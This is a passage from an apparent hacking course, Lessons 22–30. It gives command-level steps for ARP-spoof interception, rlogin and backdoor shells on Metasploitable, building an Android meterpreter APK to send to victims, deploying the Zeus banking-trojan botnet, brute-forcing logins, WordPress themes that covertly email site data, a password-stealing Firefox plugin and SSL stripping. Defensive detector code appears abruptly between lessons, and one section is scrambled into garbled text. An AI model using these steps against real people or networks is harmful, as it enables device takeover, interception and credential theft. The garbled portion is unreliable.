3. What IS needed is virtual machine software like VMware or VirtualBox.

If you have all this, then go ahead and download Metasploitable from sourceforge: http://sourceforge.net/projects/metasploitable/ The last time I checked, the download was a zip file. After extracting it, no installation is needed.

You can use VirtualBox, which is free, or VMware Workstation, which you'll have to buy. VMware Player is free, and will serve most of your purposes. Detailed guides are available for all of these on the internet, and I won't waste much time with it. I am using VMware Workstation, and will give the instructions for it. Assuming you have downloaded and extracted the Metasploitable file, and installed VMware Workstation, follow these instructions:
1. Open VMware Workstation. It must look somewhat like this.
2. Click on File -> Open. Something like this will pop out.
3. After that browse to the location where you extracted the Metasploitable file. You will see something with a VMware icon. Open that one. Click on Open.
4. Your virtual machine will be up and running within a few minutes. Depending on the situation, a few more "next" and "enter" steps would be required, but the instructions provided by the program would be simple and clear and you can help yourself.

Once you've started Metasploitable, you'll have a login prompt, and the login username and password would be given right there. It would be msfadmin. Now your target is ready. Nothing else needs to be done here, but you are far from done.

Kali Linux and Metasploit

While it's not necessary to use Kali Linux, there is no reason why NOT to use Kali Linux. It has some advantages over Backtrack: it has been written from scratch in Debian and has resolved most of the Backtrack issues, and is specifically designed for pentesting. It simplifies everything for you, providing you with 100s of tools pre-installed. It comes preinstalled with Metasploit, so it takes down one step. Backbox Linux and other Linux distributions will work well too. If you have been following this blog for a long time, then you have probably already installed Kali Linux and know how to use it, and Backtrack, most importantly. If this is not your first visit to this blog, then you also know how to use Metasploit to hack a Windows machine. So if you have the OS and the basic hacking skills, and are ready to jump to the next post, then you can stop here and move to the next post (coming soon). If not, follow along.

Lesson 22: Man In The Middle Attack

Today our tutorial will talk about Kali Linux Man in the Middle Attack: how to perform a man in the middle attack using Kali Linux. I believe most of you already know and have learned about the concept of what a man in the middle attack is, but if you still don't know about this, here is some definition from Wikipedia:

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

We will learn the step by step process how to do this. Kali Linux must act as router between the "real router" and the victim.

Victim IP address: 192.168.8.90
Attacker network interface: eth0, with IP address: 192.168.8.93
Router IP address: 192.168.8.8

Requirements:
1. Arpspoof
2. Driftnet (according to its website, driftnet will capture all image traffic)
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack:
1. Open your terminal (CTRL + ALT + T Kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because it acts as the man in the middle attacker. Read the tutorial here how to set up packet forwarding in Linux.
2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting the Kali Linux terminal window.
3. The next step is setting up arpspoof between victim and router.
       arpspoof -i eth0 -t 192.168.8.90 192.168.8.8
4. And then setting up arpspoof to capture all packets from router to victim.
       arpspoof -i eth0 192.168.8.8 192.168.8.90
5. After steps three and four, now all the packets sent or received by the victim should be going through the attacker machine.
6. Now we can try to use driftnet to monitor all victim image traffic. Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this:
       driftnet -i eth0
   When the victim browses a website with images, here is what it should look like.
8. To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
9. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code:
       urlsnarf -i eth0
   and urlsnarf will start capturing all website addresses visited by the victim machine. When the victim browses a website, the attacker will know the address the victim visited.

Lesson 23: Metasploitable 2 – Vulnerability Assessment, Remote Login

If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.

Portscan

On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. So, you can use an Nmap scan. To scan that whole range:

    nmap -sS 192.168.154.0/24

This will give you an idea of what the IP of your target machine could be. Here is what it should look like. After logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).
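The arpspoof steps in Lesson 22 above work by sending forged ARP replies, so that the victim maps the router's IP to the attacker's MAC and the router maps the victim's IP to that same MAC. That leaves a fingerprint a defender can watch for on the wire: an IP whose MAC suddenly changes, and one MAC answering for two IPs at once. Here is an added detector for that pattern; it is my code, not part of the tutorial or of the dsniff tools. It runs over constructed, tcpdump-style ARP reply lines that use the lab addresses from the lesson (router .8, victim .90), and the MAC addresses in the sample are made-up values.

```python
import re
from collections import defaultdict

# Added example, not part of the tutorial or of arpspoof/dsniff.
# Input format is a constructed, tcpdump-like line per ARP reply:
#   <timestamp> Reply <sender ip> is-at <sender mac>

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+)\s+Reply\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+"
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})$"
)

# Constructed log. Lab addresses are the lesson's (router .8, victim .90); the
# MACs are made up: aa:..:01 = router, bb:..:02 = victim, cc:..:03 = attacker.
SAMPLE_ARP_LOG = """\
12:00:01.000 Reply 192.168.8.8 is-at aa:aa:aa:aa:aa:01
12:00:01.050 Reply 192.168.8.90 is-at bb:bb:bb:bb:bb:02
12:00:05.000 Reply 192.168.8.8 is-at cc:cc:cc:cc:cc:03
12:00:05.010 Reply 192.168.8.90 is-at cc:cc:cc:cc:cc:03
12:00:07.000 Reply 192.168.8.8 is-at cc:cc:cc:cc:cc:03
"""


def parse_arp_replies(text):
    """Return (timestamp, ip, mac) tuples; lines that are not ARP replies are skipped."""
    records = []
    for line in text.splitlines():
        m = ARP_REPLY.match(line.strip())
        if m:
            records.append((m["ts"], m["ip"], m["mac"].lower()))
    return records


def detect_arp_spoof(records, protected_ips):
    """Two rules over a stream of ARP replies.

    mac-change:        an IP that was answered by one MAC is now answered by another.
    one-mac-many-ips:  a single MAC answers for two or more IPs; fires once, when the
                       second IP appears, which is the shape of a two-sided arpspoof.
    protected_ips (for example the gateway) raise the severity to high.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in records:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append({"time": ts, "rule": "mac-change", "ip": ip,
                           "old_mac": prev, "new_mac": mac,
                           "severity": "high" if ip in protected_ips else "medium"})
        ip_to_mac[ip] = mac
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        if before < 2 <= len(mac_to_ips[mac]):
            claimed = sorted(mac_to_ips[mac])
            alerts.append({"time": ts, "rule": "one-mac-many-ips", "mac": mac,
                           "ips": claimed,
                           "severity": "high" if any(p in protected_ips for p in claimed)
                           else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(parse_arp_replies(SAMPLE_ARP_LOG), {"192.168.8.8"}):
        print(alert)
```

On a real network the records come from a packet capture or from arpwatch, which tracks IP-to-MAC pairings in the same way. A router that legitimately owns several addresses will trip the one-MAC-many-IPs rule, so apply that rule to the gateway plus a short allow-list rather than to every host. The fix on the network side is static ARP entries for the gateway on sensitive hosts, or Dynamic ARP Inspection on managed switches, either of which stops the forged replies from taking effect.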
Also.168. Vulnerable Web Services. Weak Passwords . There is a very resourceful article about many vulnerabilities on Rapid7 website.Some vulnerable web applications can be exploited to gain entry to the system. These backdoors can be used to gain access to the OS. As you will discover later. Misconfigured Services . Backdoors . 2.154.A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.132. On the metasploitable machine.A lot of services have been misconfigured and provide direct entry into the operating system. Exploiting The Vulnerabilities . 3.These are vulnerable to bruteforce attacks.The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192. 5. Vulnerabilities Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. 4.A few programs and services have been backdoored. it has a huge lot of open ports. There are the following kinds of vulnerabilities in Metasploitable 2- 1. 168.154. root@kali:~# rlogin usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-R [bind_address:]port:host:hostport] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command] rlogin -l root 192. We will use rlogin to remotely login to Metasploitable 2. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. RSA key fingerprint is *****.154.132 Most probably you will get something like this- root@kali:~# rlogin -l root 192.168. This vulnerability is easy to exploit.168.154.132)' can't be established.Rlogin Remember the list of open ports which you came up across during the port scan? 
The 512.168.Remote access vulnerability .132 (192.513 and 514 ports are there for remotely accessing Unix machines. Type rlogin to see the details about the command structure.154.132 The authenticity of host '192. . 6. The rsh- client is a remote login utility that it will allow users to connect to remote machines.168. you should try your previous command again. . This time around.168.154. [email protected]' (RSA) to the list of known hosts.0 on pts/0 Linux metasploitable 2. It's because we don't have ssh-client installed on Kali Linux.132 Last login: Thu May 1 11:34:55 EDT 2014 from :0. apt-get install rsh-client This will start the installation progress. things will be better. After the installation is successful.Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.132's password: As you can see. root@kali:~# rlogin -l root 192. you'll have to type yes once or twice.154.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software. the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.154. It's not because the target is not vulnerable. it is asking for a password. Kali will do the rest for you. Telnet Vulnerability Look at the open port list again. root@metasploitable:~# Now you have an administrator privilege shell on Metasploitable 2. a popular FTP server. That was as easy as typing one line. The version that is installed on Metasploit contains a backdoor.131 1524 This is a another one line exploit.168. to the extent permitted by applicable law. If a username is sent that ends in the sequence ":)" (the happy smiley). The backdoor was quickly identified and removed. To access official Ubuntu documentation.Ubuntu comes with ABSOLUTELY NO WARRANTY. but not before quite a few people downloaded it. This means anyone can login to a computer without knowing the credentials. .ubuntu. 
Till then something for your appetite- telnet 192. on the 1524 ingreslock port (see portscan result). This can be exploited using Metasploit. please visit: http://help. the backdoored version will open a listening shell on port 6200. (and installing an application).com/ You have mail. We have one more such vulnerability that can be exploited easily. We will cover this in the next tutorial. On port 21.99. Metasploitable 2 runs VSFTPD. just use :). Android smartphone (we use HTC One android 4. very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu. Metasploit framework (we use Kali Linux 1.8. Here is some initial information for this tutorial: Attacker IP address: 192.. Initially developed by Android. software. Android is an operating system based on the Linux kernel. .168. Inc.94 Attacker port to receive connection: 443 Requirements: 1.What is android? according to wikipedia: and what is APK? according to wikipedia: Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system. which Google backed financially and later bought in 2005.6 in this tutorial) 2. msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> As described above that attacker IP address is 192.168.94 now execute the command. Our tutorial for today is how to Hack Android Smartphones using Metasploit.4 KitKat) Step by Step Hacking Android Smartphone Tutorial using Metasploit: 1.8. Open terminal 2.0. Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware. the security threat is also increasing together with the growth of its users. We will utilize Metasploit payload framework to create exploit for this tutorial.Lesson 24: Hacking Android Nowadays mobile users are increasing day by day. 
and telecommunication companies devoted to advancing open standards for mobile devices. and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Info: use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2 4.94 –> attacker IP address set lport 443 –> port to listen the reverse connection exploit –> start to listen incoming connection 5. Info: set lhost 192. for example webcam_list gives you a list of the camera's on the victims device such as: back camera front camera .3.8. attacker needs to set up the handler to handle incoming connections to the port already specified above. The next step we need to configure the switch for the Metasploit payload we already specified in step 3. Type msfconsole to go to Metasploit console. After victim open the application. the meterpreter session will open and the attack has begun.168. Short stories the victim (me myself) download the malicious APK's file and install it. internet is the good place for distribution ). Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file. 7. this means that attacker already inside the victim android smartphone and he can do everything with victim phone. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine. 6. Experiment with different commands at this point. make sure you can view.webcam_snap 2 Would take a picture from one of the cameras sneaky sneaky. If you really want to install APK's from unknown source. . Conclusion: 1. 2. read and examine the source code. Don't install APK's from the unknown source. Cisco. the source code and compiled binaries are found to be hosted on GitHub. I named it bot. As of 13 May 2011. Open the internet browser and type http://localhost/phpmyadmin. Firstly. Input the username and password. NASA. 
After that create a new database. those same experts warned the retirement was a ruse and expect the cracker to return with new tricks. it became more widespread in March 2009. In late 2010. Oracle. Requirements: 1. Monster. the creator of the SpyEye trojan. Since we're using XAMPP for this tutorial. We choose Zeus because Zeus was one of the famous trojan horse viruses in history that infected many servers around 2007-2010. In June 2009.Lesson 25: Remote Administration Tool (RAT) Today we will learn how to set up Remote Administration Tool Zeus BotNet (RAT). but you can change it into whatever you want. security company Prevx discovered that Zeus had compromised over 74. Zeus is spread mainly through drive-by downloads and phishing schemes.000 FTP accounts on websites of such companies as the Bank of America. Web Server + Database Server (in this example we use XAMPP) Remote Administration Tool(RAT) Zeus BotNet: 1. a number of Internet security vendors including McAfee and Internet Identity claimed that the creator of Zeus had said that he was retiring and had given the source code and rights to sell Zeus to his biggest competitor. . 2. First identified in July 2007 when it was used to steal information from the United States Department of Transportation. and BusinessWeek. ABC. If you don't know about Zeus. you can refer to previous step by step How to Install XAMPP in 7 Simple Steps to install XAMPP on Windows machine and make sure your XAMPP apache and MySQL service was started and running. by default the username is root and password leave it empty. Play. we need to install the web server and database server. Remote Administration Tool (RAT) Zeus BotNet 2. Amazon. This database name will be used for the installation of remote administration tool.com. However.com. here is the definition from Wikipedia: Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and Form Grabbing. 3. 
– Encryption key you can fill with any characters with length from 1 – 255 click Install to start installing.txt. The next step we need to download the remote administration tool file and extract it. b. – Database is filled with information about our database name that already created in step 2. The next step is configuring and create the zeus bot client.txt configuration file. In the edit user page. Open your PHPMyAdmin http://localhost/phpmyadmin and click the Privileges tab. url_loader and url_server configuration according to your settings for your IP address. I give the folder name as bot. Note: don't forget to edit the path of webinjects. Create a new folder inside C:\xampp\htdocs. If you run XAMPP it should be your IP address. Open the builder folder and open config. Notes: If you get this error ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this MySQL server You need to do the following step by step a. you will find 3 main folders. Input all required field with the correct information. Now back again into our web browser and type http://localhost/bot/install into the address bar. Change the Host from localhost to Any host and press Go button. and server[php]. 6. . then copy the server [php] contents into C:\xampp\htdocs\bot. Change the url_config. Click edit button to edit the root user privileges. 4. scroll down and find the login information section. builder. Information: – The host address for MySQL filled with your database server IP address. other. 7. We can see the new infected victim in the web interface and even view the desktop screenshot of the victim. always update your operating system and anti virus and do not click any link that looks suspicious in your mail or chat messenger. 2. When victim already infected.exe file. Click builder.exe to the victim. Click build the bot configuration under the actions header. .bin and bot. To prevent the attack of this trojan.php and insert your username and password.exe. 
then click browse. After victim execute the file we can check our attacker server. . Now for the next step. 8. 9. then build the bot executable. Mine was inside C:\xampp\htdocs\bot. Copy those two file into the htdocs folder. Now let's says we will send the generated bot. attacker can gather many information from the victim including all internet activities and even gather all the website username and password since this tool can act as a keylogger and capturing the log in information. Open the browser and type http://localhost/bot/cp. now we have the new file config. After all the build bot config and bot executable on step 7. Conclusion: 1. 10. open the zsb. In order to receive authorization the client should send requested identification information using Authorization header. Hacking HTTP Basic Authentication Dictionary Attacks with Burp Suite Free: .net (in this tutorial I use the free edition) and install it. The clients need to provide the credentials in a Base64 encoded string username:password. Compose a basic PHP login script to use on the victim machine.Lesson 26: Hacking Basic HTTP Authentication using Burp Suite Hacking http basic authentication dictionary attacks with burp suite free is our tutorial for today. here is the explanation from their website: Burp Suite is an integrated platform for performing security testing of web applications. Burp gives you full control. more effective. from initial mapping and analysis of an application's attack surface. Upon a request for resource within a protected space the server should respond with authentication challenge using WWW-Authenticate header. to make your work faster. Requirements: 1. through to finding and exploiting security vulnerabilities. HTTP supports several authentication mechanisms. Its various tools work seamlessly together to support the entire testing process. The simplest and most common HTTP authentication in use is Basic. If you just hear about BURP suite. 2. 
Download BURP suite at portswigger. and more fun. letting you combine advanced manual techniques with state-of-the-art automation. we will use a tool called BURP suite. Explanation about HTTP basic authentication. When the client is not authorised a 401 “Unauthorised” response status is returned. If the credentials are correct the web server returns the requested resource otherwise the server repeats the authentication challenge. BURP will intercept the data. but in above example I input the passwrd one by one. we're still on PAYLOADS TAB. 6. The PHP script on requirement number 2 is a simple log in page. After finished setting up the attack type. Now we will change the payload set number two. Run your BURP suite and change your browser proxy setting to run through BURP application. now we can access the login. for testing purpose. Right click and choose "Send to Intruder". I input the username one by one. . 5.1. In this example. On INTRUDER –> POSITIONS tab. 4. By default BURP will use port 8080. if you don't know how to change the browser proxy settings. . I will input username = test and password = test. change the attack type to "Cluster Bomb". we can move to PAYLOADS tab. When proxy already set up. a simple google search can tell you how. 8. The last PAYLOADS to set up is the submit parameter. On payload number three we will input the password. see the picture on step 4 Payload set 1 = PHPSESSID (the value) we will set up the same PHP SESSID value. 2. You can copy it to your HTDOCS folder if you use XAMPP or WAMP for your web development platform. 3. because the system uses a static PHPSESSID. Payload set 2 = username (the value) you can load the username data from username list. 7. To fill this PAYLOADS. When we click the submit button(LOG IN). Payload set 3 = password (the value) on this step you also can load from a password list.php file. the system will force the user to solve the captcha. 
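The server side of the Basic exchange explained above, as an added example rather than code from the course: it parses the Authorization header, issues the WWW-Authenticate challenge, and counts failed attempts per client address so that trying many username:password pairs in a row gets throttled instead of answered at full speed. The user store, the salt, and the five-attempt/300-second lockout are assumptions.

```python
import base64
import binascii
import hashlib
import hmac
import time

# Constructed credential store for the example: salted PBKDF2 hashes, never plaintext.
# The salt, the iteration count and the weak "admin"/"123456" pair are assumptions.
_SALT = b"example-salt"
_ITER = 100_000


def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, _ITER)


USERS = {"admin": _hash("123456")}
_DUMMY = _hash("unused")          # hashed even for unknown users, so timing stays uniform

MAX_FAILURES = 5                  # assumed policy: lock a client address after 5 failures
LOCKOUT_SECONDS = 300             # ... for five minutes


def make_header(user, password):
    """Client side of Basic: 'Basic ' + base64(username:password)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")


def parse_header(header):
    """Return (username, password) from an Authorization header, or None if malformed."""
    if not header or not header.lower().startswith("basic "):
        return None
    try:
        raw = base64.b64decode(header[6:].strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")   # the password itself may contain ':'
    return (user, password) if sep else None


class BasicAuthGuard:
    """Checks Basic credentials and throttles repeated failures per client IP."""

    def __init__(self, realm="Restricted"):
        self.challenge = {"WWW-Authenticate": f'Basic realm="{realm}"'}
        self.failures = {}            # ip -> (failure count, time of first failure)

    def _locked(self, ip, now):
        count, since = self.failures.get(ip, (0, now))
        if now - since > LOCKOUT_SECONDS:   # window expired: forget the old failures
            self.failures.pop(ip, None)
            return False
        return count >= MAX_FAILURES

    def handle(self, header, ip, now=None):
        """Return (status, headers): 200, 401 with the challenge, or 429 when throttled."""
        now = time.time() if now is None else now
        if self._locked(ip, now):
            return 429, {"Retry-After": str(LOCKOUT_SECONDS)}
        creds = parse_header(header)
        if creds is None:
            return 401, self.challenge
        user, password = creds
        expected = USERS.get(user, _DUMMY)
        if user in USERS and hmac.compare_digest(expected, _hash(password)):
            self.failures.pop(ip, None)   # a success clears the counter
            return 200, {}
        count, since = self.failures.get(ip, (0, now))
        self.failures[ip] = (count + 1, since)
        return 401, self.challenge
```

Once the counter is in place, the sixth guess from the same address gets a 429 rather than a verdict, which is what turns a dictionary run from minutes into days.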
Payload set 4 = submit (the value): since this submit is there to check whether the user clicked the button or not, we can make it the same value LOG+IN%21.
9. Every PAYLOAD has been set up successfully; now we will start the attack and watch BURP suite perform the attack automatically. Click Intruder and choose "Start Attack".
10. BURP suite intruder will check the usernames and passwords one by one. When there's a matching username and password, you can see that the length has changed. From this example we know that the username = admin and password = 123456.

Conclusion:
1. To prevent this kind of attack, as a user you can do nothing. As a developer you can add a salt into the username and password to make the attack time much longer, since you've added the salt.
2. As a developer you can do like the GMail anti brute force system, where every try is logged by the system based on its IP address. If you try to log in and fail several times, the system will force the user to solve a captcha. But in my opinion the first conclusion was better.

Lesson 27: Hacking WordPress – Send Secret emails from malicious layout codes about site info

Today's title is Hacking WordPress: Send Email Secretly About Website Information. Script to send email secretly (ask for the script when ready).

Requirements:
1. Understand PHP.
2. Know WordPress functions.

Step by step Hacking WordPress: Send Email Secretly About Website Information:
1. We want to know about the WordPress user information of a user. Let's see the following script:
2. The script in step one, if executed, will show the details of the active WordPress user (logged in). Execute this script on your local WordPress server; here is what I got:
Username: victim
Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB
User email: victim@victim.com
User first name:
User last name:
User display name: victim
User ID: 1
3. Even if we know the username and password hash, we still need time to crack the password hash to get the plain password of the user. In our last hacking tutorial about WordPress, the hacking tutorial to add an administrator user secretly, we could add an administrator secretly by spreading the malicious themes, but the problem is: "how do we know who has already downloaded the malicious WordPress themes?"
4. From the problem in step three, we will use the method of combining this tutorial with the WordPress hacking tutorial to add an administrator user secretly, and send the URL address of the infected website by inserting the following script.
5. The script I provide you will send an email secretly to the attacker containing the WordPress URL when the victim logs in and browses his/her WordPress website, and here is the result.
6. When you see this email address, it's way too plain; how about if we encode it using the base64_encode PHP function?

Conclusion:
1. Usually this kind of attack you can find in premium WordPress themes (nulled edition or warez). Download WordPress themes only from a trusted source.
2. Buying is usually better than "free download".
3. Make sure you check the source code of the themes one by one to minimize the attack. You can give it a try to find the strings below in your theme code (especially the nulled and warez editions) to check whether it has malicious code or not:
base64_encode (most attackers use base64 encoding)
http:// (check the URL that is going somewhere)

Lesson 28: Reveal Asterisk Saved Passwords

We will learn how to reveal the asterisks on Mozilla Firefox and Google Chrome without seeing the saved password from the browser options menu. If you have still never heard about Firebug, here is the description from Wikipedia: Firebug is a web development tool that facilitates the debugging, editing, and monitoring of any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development tools. Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as external CSS, JavaScript, and image files.
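The theme check from the WordPress lesson's conclusion, carried out in code as an added example that is not part of the course: it walks the PHP files of a theme, flags the two strings the lesson names (base64 and a URL) plus a few other obfuscation helpers seen in the same kind of code (eval, gzinflate, str_rot13), and decodes each base64 literal so that a hidden callback URL or mail address becomes visible. The sample theme, the attacker URL and the mailbox in it are constructed for the example.

```python
import base64
import os
import re

# Constructed sample theme in the style of the nulled-theme backdoor the lesson describes.
# The encoded URL and mailbox are hypothetical values built here, not taken from any real theme.
_URL = b"http://example.invalid/collect.php"
_MAIL = b"attacker@example.invalid"
SAMPLE_THEME = {
    "functions.php": (
        "<?php\n"
        "function theme_setup() { add_theme_support('post-thumbnails'); }\n"
        "add_action('wp_login', function($user) {\n"
        f"  $url = base64_decode('{base64.b64encode(_URL).decode()}');\n"
        f"  @mail(base64_decode('{base64.b64encode(_MAIL).decode()}'), 'site', get_site_url());\n"
        "});\n"
    ),
    "style.css": "/* Theme Name: Clean */ body { margin: 0; }\n",
}

# base64 literal passed straight to base64_encode/base64_decode
B64_LITERAL = re.compile(r"base64_(?:en|de)code\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]")
# calls worth a second look in theme code: encoding helpers and mail senders
SUSPECT_CALLS = re.compile(r"\b(base64_(?:en|de)code|mail|wp_mail|eval|gzinflate|str_rot13)\s*\(")
# the "http://" string the lesson mentions, and e-mail addresses, inside decoded data
INDICATOR = re.compile(r"(https?://\S+|[\w.+-]+@[\w-]+\.[\w.-]+)")


def decode_literal(literal):
    """Decode one base64 literal; return text only if it decodes to printable data."""
    try:
        text = base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    return text if text.isprintable() else None


def scan_source(name, source):
    """Findings for one file as (file, line, kind, detail): suspicious calls and hidden URLs/mails."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for call in SUSPECT_CALLS.findall(line):
            findings.append((name, lineno, "call", call))
        for literal in B64_LITERAL.findall(line):
            decoded = decode_literal(literal)
            if decoded:
                for hit in INDICATOR.findall(decoded):
                    findings.append((name, lineno, "hidden", hit))
    return findings


def scan_theme(files):
    """Scan a {filename: source} mapping; only PHP files can carry executable code."""
    out = []
    for name, source in files.items():
        if name.endswith(".php"):
            out.extend(scan_source(name, source))
    return out


def scan_directory(root):
    """Same check over a real theme directory on disk (e.g. wp-content/themes/<name>)."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith(".php"):
                path = os.path.join(dirpath, n)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan_theme(files)
```

A "hidden" finding is the strongest signal: legitimate theme code has little reason to keep a URL or mailbox in base64.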
The net panel can display both request headers and response headers for each page asset; it can also estimate the time each asset took to load.

Requirements:
1. Mozilla Firefox with the Firebug add-on.
2. Google Chrome.

Step by step to Reveal Asterisk Saved Passwords on Mozilla Firefox and Chrome:
1. Open our Mozilla Firefox browser, press ALT –> click Tools –> click Add-ons.
2. On the Add-ons page there is a search box; type firebug in the textbox and click search, or you can go directly to this page https://addons.mozilla.org/en-US/firefox/addon/firebug/. Click install if there is a pop-up window asking you to install this add-on, and restart your browser.
3. This is the Firebug button. To activate Firebug you only need to click this button, and click once again to deactivate it.
4. Now we try to open a website with a log in page, e.g. mail.live.com, and input the password. Right click on the password box and choose Inspect Element.
5. Double click the type="password" and change it into type="text".
6. The asterisk password will be shown and revealed.
7. What if it is on the Google Chrome browser? The steps are the same. Open the log in page, right click the password box and choose Inspect Element.
8. Change the input type="password" to type="text". The password is revealed.

Lesson 29: Hacking Internet User's Passwords Using 'Malicious' Firefox Plugin

The title Hacking Internet Users Password Using Malicious Firefox Plugin has come after some students asked about the possibility of gathering usernames and passwords from a browser plugin. The answer is yes, you can gather a username and password from internet users when they have installed a malicious plugin. According to Wikipedia a plugin is: In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to an existing software application. When an application supports plug-ins, it enables customization. The common examples are the plug-ins used in web browsers to add new features such as search-engines, virus scanners, or the ability to utilize a new file type such as a new video format.

In this Hacking Internet Users Password Using Malicious Firefox Plugin case, the attacker will change or add or modify or create the main function of a Firefox plugin and override or rewrite some function to do some malicious activities for the benefit of the attacker.

Requirements:
1. Firefox malicious plugin
2. Understand Javascript
3. Social Engineering

How to Hack Internet Users' Passwords Using a Malicious Firefox Plugin: The victim browser, which has a malicious Firefox plugin installed, is accessing the internet. As the victim browses the internet, the infected browser will also send the data to the attacker server. The data is which website the victim visited, and it sends the username and password as well. The attacker harvester website will grab all GET or POST method data and store it in a simple TXT file, but it can be changed to another database server as well.

Conclusion:
1. Make sure you download plugins only from a trusted source (e.g: http://addons.mozilla.org/).

Lesson 30: Breaking SSL Encryption

Level: Medium – Advanced

Some people ask "Are you sure SSL (Secure Socket Layer) port 443 can be hacked and we know the password sent over the network??"... How to break SSL protection using sslstrip? What is SSL? Actually, if you see my explanation about SSL in my previous post, when we try to break the encryption it's a little bit hard to break, but here in this tutorial I will explain how to break the SSL encryption without breaking the SSL encryption, using a Man in the Middle Attack :-).

Man in the Middle Attack Requirement:
1. Kali Linux
2. Arpspoof
3. IPTables
4. SSLStrip (SSLSTRIP may need to be downloaded and installed)
5. NetStat

Install SSL Strip (optional):
1. Download SSL Strip
2. tar zxvf sslstrip-0.9.tar.gz
3. cd sslstrip-0.9
4. python setup.py install

SSL Strip: Created by Moxie Marlinspike, who provides a demonstration of the HTTPS stripping attacks that he presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. -Taken from author website- This all happens on the fly, and is practically invisible to users. The only way to notice is by checking the URL in the address bar, where normally it would display HTTPS; it will now display HTTP instead.

Perform the Attack – Man in the Middle Attack:
1. Set your Linux box to make it able to forward every incoming port (enable port forwarding).
echo '1' > /proc/sys/net/ipv4/ip_forward
This code will let your Linux Backtrack have the ability to forward every packet that was not intended for your machine.
2. Know your network gateway:
netstat -nr
For example, I already know that my gateway address is 192.168.8.8.
3. Use ARP spoof to perform the Man in the Middle Attack:
arpspoof -i eth0 192.168.8.8
a. Change "eth0" to the network card that is currently connected to the network. Usually it is eth0 or wlan0.
b. Change "192.168.8.8" to your network default gateway.
c. In this tutorial I use arpspoof on the entire network. Be careful if your network has a large userbase connected to it, because it will crash your network and bring your network down.

Break SSL Protection Using SSLStrip and Kali Linux:
1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2. After finishing setting up iptables, the next step is to redirect all network HTTP traffic through our computer using ARP Spoof (don't forget to enable IP forwarding).
echo '1' > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.8.8
When everything is running well, you will see that ARPSpoof is capturing network traffic.
3. Then the next step: you need to start your SSL Strip by opening a new terminal (CTRL+ALT+T):
sslstrip -l 8080
"-l" tells the system to listen on the specified port.
